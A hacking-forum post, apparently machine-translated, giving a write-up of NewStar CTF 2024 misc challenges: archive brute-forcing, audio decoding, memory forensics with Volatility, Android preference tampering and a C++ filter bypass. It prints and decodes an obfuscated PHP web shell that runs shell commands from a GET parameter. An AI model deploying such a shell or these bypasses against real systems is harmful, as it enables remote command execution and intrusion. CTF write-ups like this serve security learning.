Jump to content

Title: NewStar CTF 2024 misc WP

UKhackteam
UKhackteam
in Hacker Cracking / Penetration Testing / Cybersecurity

Featured Replies

Posted

decompress

Compress the doll, solve it until the last layer, extract the file

image-20241024133500142

The prompt gives a regular code, according to the regular blasting password, there are five digits in total, and the fourth digit is the number

^([a-z]){3}\d[a-z]$ has five digits in total, and it is directly ARCHPR blasted, get the password xtr4m, decompressed to get flag

image-20241024143051751

image-20241024133955066

pleasingMusic

The title description mentions:

A song can be heard well, both positive and negative, and the positive and negative are good. According to the prompts (in fact, you can also hear that the second half of the music is played backward), the audio is reversely processed and then the Morse Code is parsed.

界面 1 界面 2

The Morse code meter can be translated manually or online decoding can be used.

Coarse representation: -, thin representation:Space or space: Use space or/segment

Morse 解密结果

image-20241024134921354

WhereIsFlag

Pure command manual search to find the real flag. In the /proc/self/environ file (can be used to obtain the environment variables of the current process), you can get the flag by executing the following command.

cat /proc/self/environ image-20241024135548272

Labyirinth

image-20241024135921781

image-20241024135957928

Redeem code

image-20241024140300688

wireshark_checkin

image-20241024140542352

image-20241024140718246

wireshark_secret

image-20241024141014162

image-20241024141234550

Contact the title description and find the Tivat text comparison table

image-20241024141652291

The comparison table explains a lot

I tried the big string in the middle at the beginning, but the upper and lower cases were not correct

Then continue to decrypt the small cipher text around and get: FLAGISASENTENCE IIAAELGTSFKFA

DOYOUKNOWFENCE MESIOAABGNHNSGOGMYEIADE

Tip flag is a sentence, and FENCE is also the fence encryption MESIOAABGNHNSGOGMYEIADE

https://ctf.bugku.com/tool/railfence

image-20241024142911077

The package flag is not correct when submission is submitted, and the lowercase is correct when switching to lowercase.

The final flag is: flag{maybegenshinisagoodgame}

The Secret between the Lines

Open with vscode and discover the wide zero bytes of U+202c

image-20241024143304292

image-20241024143434003

Get the password: it_is_k3y

Open word with password, find blank, select all ctr+A, copy it out, get flag

image-20241024143550459

Xiao Ming, who is enthusiastic and helpful

vol.py -f image.raw imageinfo

image-20241024143952884

It can be seen that the recommended operating system versions are: Win7SP1x86_23418, Win7SP0x86, Win7SP1x86_24000, Win7SP1x86. Here you select the first one (Win7SP1x86_23418) to try it. Anyway, if it doesn't work, try something else.

voL.py -f image.raw --profile=Win/SP1x86_23418 lsadump

image-20241024144028191

The beginning0x48 is not a password, you can understand it as a sign. Apart from this you can get the system password: ZDFyVDlfdTNlUl9wNHNTdzByRF9IQUNLRVIh.

The final flag is flag{ZDFyVDlfdTNlUl9wNHNTdzByRF9IQUNLRVIh}

With the typhoon of Volt using the tracer

Step 1, open the link to the news video

bilibili1

bilibili2

Based on the video, we get the following information:

Required Report: The Rise of Dark Power. Corresponding Version: Original April 15th Version Status: The required information has been tampered with. We directly search for the report name

https://threatmon.io/storage/the-rise-of-dark-power-a-close-look-at-the-group-and-their-ransomware.pdf

google

duckduckgo

You can see the PDF file we need, but the video also mentioned that the report content has been tampered with.

篡改

So the current version definitely does not have the information we need.

The questioner was lucky before, and he found the original version PDF that he could download directly, and he could start doing it directly.

But what should I do if I’m not lucky? We ask our website to use the —— wayback machine.

wayback 1

Enter the official website link and start the tracer, which happens to be available on April 15th.

wayback 2

wayback 3

Download the file and the rest will be the same as the ones demonstrated in the video.

Remove the back cover image, get the stuff in the Domain box, and then MD5,

Of course, if you can directly read out the vague information in the video with your naked eyes, the questioner will recognize it.

domain

md5

Pack the flag and get flag{6c3ea51b6f9d4f5e}.

Herta's Study

http export get upload.php

image-20241024145523278

?php

$payload=$_GET['payload'];

$payload=shell_exec($payload);

$bbb=create_function(

base64_decode('J'.str_rot13('T').'5z'),

base64_decode('JG5zPWJhc2U2NF9lbmNvZGUoJG5zKTsNCmZvcigkaT0wOyRpPHN0cmxlbigkbnMpOyRp

Kz0xKXsNCiAgICBpZigkaSUy'.str_rot13('CG0kXKfAPvNtVPNtVPNtWT5mJlEcKG1m').'dHJfcm90MTMoJG5zWyRpXSk7DQo

gICAgfQ0KfQ0KcmV0dXJuICRuczs==')

);

echo $bbb($payload);

The ?str_rot13() function performs ROT13 encoding on a string.

ROT13 encoding is to move each letter forward by 13 letters in the alphabet. Numbers and non-alphabetical characters remain the same.

'.' is the connector in php, so the uploaded php code is actually:

?php

$payload=$_GET['payload'];

$payload=shell_exec($payload);

$bbb=function ($ns) {

$ns=base64_encode($ns);

for ($i=0; $i strlen($ns); $i++) {

if ($i % 2==1) {

$ns[$i]=str_rot13($ns[$i]);

}

}

return $ns;

};

echo $bbb($payload);

?According to the code, you can see that the result is encoded by base64, and then the odd-digit characters inside are encoded with str_rot13.

Then find the package requesting the flag and decode it, but find that it is a fake flag.

?php

$result='ZzxuZ3tmSQNsaGRsUmBsNzVOdKQkZaVZLa0tCt==';

$bbb=function ($ns) {

for ($i=0; $i strlen($ns); $i++) {

if ($i % 2==1) {

$ns[$i]=str_rot13($ns[$i]);

}

}

return $ns;

};

echo base64_decode($bbb($result));

?Later, I went to find f.txt and solved the flag:flag{sH3_i4_S0_6eAut1fuL.}

Is BGM broken?

When you open the audio with Audacity, it is easy to find that there is information at the end of the right channel, while the left channel is noise.

audacity 1

According to the description of the question, it is a dial tone, but it cannot be released directly, so the noise needs to be deleted

Select Separate stereo to mono » Turn off left channel » Export image-20241024151621861

image-20241024151650045

image-20241024151704929

audacity 4

Decryption website by key sound (i.e. DTMF Decoder

image-20241024151752387

image-20241024151805669

Just wrap flag{}

AmazingGame

The private Android directory is located in /data/user/0/package name

Android shared_prefs is generally used to store software configuration data

Modify the file to change the passed level data

After passing the first level, turn off the game (this is very important)

ADB link to the mobile phone execution

Shell

adb shell

run-as com.pangbai.projectm

cd shared_prefs

cat net.osaris.turbofly.JumpyBall.xmlxml

?xml version='1.0' encoding='utf-8' standalone='yes' ?

map

boolean name='cockpitView' value='true' /

int name='unlockedsolotracks' value='2' /

int name='unlockedtracks' value='2' /

int name='best0m0' value='130' /

int name='unlockedships' value='1' /

int name='userid' value='9705893' /

/map software has 23 levels, we change the unlocking number of levels to 23

Normally, adb push should be used to modify the file. Here, we directly replace 2 with 23 for convenience.

Shell

sed -i 's/2/23/g' net.osaris.turbofly.JumpyBall.xml Open the game and find that all levels are unlocked. Play 23 levels at will. You can get flags when the game is over.

ez_jail

The original meaning of this question is to only test the knowledge of (macro) substitution operator in C++

As long as the keywords are used correctly, you can search online, but the execution of the question-setting person is broken, and a lot of unexpected results appear during the test. After considering the difficulty of each knowledge point, I felt that the unexpected difficulty was not much different from the expected solution, so I simply became a semi-open question.

We observe the check function of the code

python

def cpp_code_checker(code):

if '#include' in code:

return False, 'Code is not allowed to include libraries'

if '#define' in code:

return False, 'Code is not allowed to use macros'

if '{' in code or '}' in code:

Return (

False,

'Code is not allowed to use `{` or `}`,but it needs to be a single function',

)

if len(code) 100:

return False, 'Code is too long'

return True, 'Code is valid' This code seems to filter #include #define, etc. but I don't know if the students have realized that adding spaces after # can bypass this, which means that pre-compilation can be pre-processed through macro definitions

So Payload can be like this (thanks to Master Yuro for providing the solution)

cpp

# define user_code() write(STDOUT_FILENO, 'Hello, World!', 13);

  • Quote

    • Join the conversation

    You can post now and register later. If you have an account, sign in now to post with your account.
    Note: Your post will require moderator approval before it will be visible.

    Guest
    Reply to this topic...
    Go to topic listing

    Important Information

    HackTeam Cookie PolicyWe have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.